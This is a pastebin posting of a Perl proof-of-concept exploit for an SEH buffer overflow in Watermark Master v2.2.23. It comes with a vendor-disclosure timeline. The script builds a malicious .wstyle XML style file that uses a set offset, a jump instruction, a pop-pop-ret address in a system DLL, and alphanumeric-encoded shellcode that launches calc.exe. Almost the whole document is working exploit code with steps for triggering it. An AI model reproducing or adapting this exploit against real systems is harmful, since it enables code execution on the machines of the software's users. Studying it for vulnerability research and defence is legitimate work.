Watermark Master v2.2.23 .wstyle - Buffer Overflow (SEH)


SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:59 p.m.

FORMAT: Text only

SIZE: 5.9 kB

HITS: 1971

  1. #!/usr/bin/perl
  2. #########################################################################################
  3. # Exploit Title: Watermark Master v2.2.23 .wstyle Buffer Overflow (SEH)
  4. # Date: 10-28-2013
  5. # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift
  6. # Vulnerable Software: Watermark Master v2.2.23
  7. # Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe
  8. # Version: 2.2.23
  9. # Tested On: Windows XP SP3
  10. #########################################################################################
  11. # Timeline:
  12. # - Oct 28: Vuln discovered, vendor alerted and acknowledged receipt of bug submission
  13. # - Oct 29: Requested fix timeline from vendor for public disclosure
  14. # - Nov 1: Similar exploit publicaly released for same version of software
  15. # -- http://www.exploit-db.com/exploits/29327/
  16. # - Nov 3: No response from vendor, follow-up email sent
  17. # - Nov 14: No response from vendor, public disclosure
  18. #########################################################################################
  19. # Creates a malicious Style file (.wstyle)
  20. #
  21. # To exploit:
  22. # 1) Place sploit.wstyle file in Video Styles folder
  23. # ..\Videocharge Software\Watermark Master\Styles\Video
  24. # 2) Launch Watermark Master application, add an image and apply the style
  25. # WaterMark --> Add --> Image (can also add text, rectangle, etc)
  26. # WaterMark --> Apply Style... --> sploit
  27. # 3) Save (Ctrl+s) -- Application will crash, launching the exploit
  28. #########################################################################################
  29. my $buffsize = 15000; # sets buffer size for consistent sized payload
  30. my $xmlstart = '<?xml version="1.0" encoding="Windows-1251" ?> <cols name="'; # build the start of the xml file
  31. # nseh is at offset 512, followed by 9484 bytes of available data
  32. my $junk = "\x41" x (512 - $xmlstart);
  33. my $nseh = "\xeb\x08\x90\x90"; # overwrite next seh with jmp instruction (8 bytes)
  34. my $seh = pack('V',0x72D11F39); # overwrite seh w/ pop edi pop esi ret
  35. # ASLR: False, Rebase: False, SafeSEH: False, OS: True
  36. # (C:\WINDOWS\system32\msacm32.drv) (no suitable app modules found)
  37. my $nops = "\x90" x 20;
  38. # Alpha-numeric encoding used for xml-based Calc.exe payload
  39. # msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R |
  40. # msfencode -e x86/alpha_upper -b '\x00\xac\xff\xca'
  41. # size 469
  42. my $shell = "\x89\xe6\xd9\xeb\xd9\x76\xf4\x5b\x53\x59\x49\x49\x49\x49" .
  43. "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
  44. "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
  45. "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
  46. "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
  47. "\x58\x4d\x59\x35\x50\x33\x30\x45\x50\x35\x30\x4c\x49\x4b" .
  48. "\x55\x46\x51\x48\x52\x42\x44\x4c\x4b\x50\x52\x36\x50\x4c" .
  49. "\x4b\x30\x52\x54\x4c\x4c\x4b\x46\x32\x42\x34\x4c\x4b\x34" .
  50. "\x32\x57\x58\x44\x4f\x58\x37\x50\x4a\x56\x46\x36\x51\x4b" .
  51. "\x4f\x50\x31\x59\x50\x4e\x4c\x37\x4c\x53\x51\x53\x4c\x44" .
  52. "\x42\x46\x4c\x37\x50\x49\x51\x58\x4f\x44\x4d\x33\x31\x58" .
  53. "\x47\x4a\x42\x5a\x50\x31\x42\x30\x57\x4c\x4b\x50\x52\x54" .
  54. "\x50\x4c\x4b\x57\x32\x47\x4c\x55\x51\x38\x50\x4c\x4b\x31" .
  55. "\x50\x34\x38\x4b\x35\x4f\x30\x43\x44\x51\x5a\x45\x51\x38" .
  56. "\x50\x36\x30\x4c\x4b\x30\x48\x34\x58\x4c\x4b\x36\x38\x51" .
  57. "\x30\x33\x31\x59\x43\x4b\x53\x57\x4c\x51\x59\x4c\x4b\x46" .
  58. "\x54\x4c\x4b\x45\x51\x39\x46\x46\x51\x4b\x4f\x50\x31\x59" .
  59. "\x50\x4e\x4c\x4f\x31\x48\x4f\x34\x4d\x55\x51\x58\x47\x56" .
  60. "\x58\x4d\x30\x33\x45\x4c\x34\x54\x43\x53\x4d\x5a\x58\x47" .
  61. "\x4b\x33\x4d\x31\x34\x33\x45\x4b\x52\x46\x38\x4c\x4b\x31" .
  62. "\x48\x31\x34\x35\x51\x4e\x33\x55\x36\x4c\x4b\x44\x4c\x50" .
  63. "\x4b\x4c\x4b\x56\x38\x35\x4c\x43\x31\x59\x43\x4c\x4b\x45" .
  64. "\x54\x4c\x4b\x35\x51\x58\x50\x4c\x49\x31\x54\x57\x54\x37" .
  65. "\x54\x51\x4b\x51\x4b\x43\x51\x50\x59\x51\x4a\x36\x31\x4b" .
  66. "\x4f\x4d\x30\x30\x58\x31\x4f\x50\x5a\x4c\x4b\x35\x42\x5a" .
  67. "\x4b\x4c\x46\x31\x4d\x53\x5a\x45\x51\x4c\x4d\x4d\x55\x4e" .
  68. "\x59\x33\x30\x45\x50\x53\x30\x50\x50\x32\x48\x56\x51\x4c" .
  69. "\x4b\x52\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x4b\x4e\x54" .
  70. "\x4e\x57\x42\x5a\x4a\x33\x58\x4f\x56\x4d\x45\x4f\x4d\x4d" .
  71. "\x4d\x4b\x4f\x38\x55\x57\x4c\x54\x46\x53\x4c\x34\x4a\x4b" .
  72. "\x30\x4b\x4b\x4b\x50\x52\x55\x34\x45\x4f\x4b\x57\x37\x32" .
  73. "\x33\x33\x42\x52\x4f\x52\x4a\x43\x30\x51\x43\x4b\x4f\x39" .
  74. "\x45\x45\x33\x35\x31\x42\x4c\x33\x53\x46\x4e\x32\x45\x34" .
  75. "\x38\x53\x55\x53\x30\x41\x41";
  76. my $xmlend = '" clsid="blah"> </cols>'; # build the rest of the xml file
  77. my $sploit = $junk.$nseh.$seh.$nops.$shell; # build sploit portion of buffer
  78. my $fill = "\x43" x ($buffsize - (length($xmlstart)+length($sploit)+length($xmlend))); # fill remainder of buffer with junk for consistent size
  79. my $buffer = $xmlstart.$sploit.$fill.$xmlend; # build final buffer
  80. # write the exploit buffer to file
  81. my $file = "sploit.wstyle";
  82. open(FILE, ">$file");
  83. print FILE $buffer;
  84. close(FILE);
  85. print "Exploit file created [" . $file . "]\n";
  86. print "Buffer size: " . length($buffer) . "\n";

comments powered by Disqus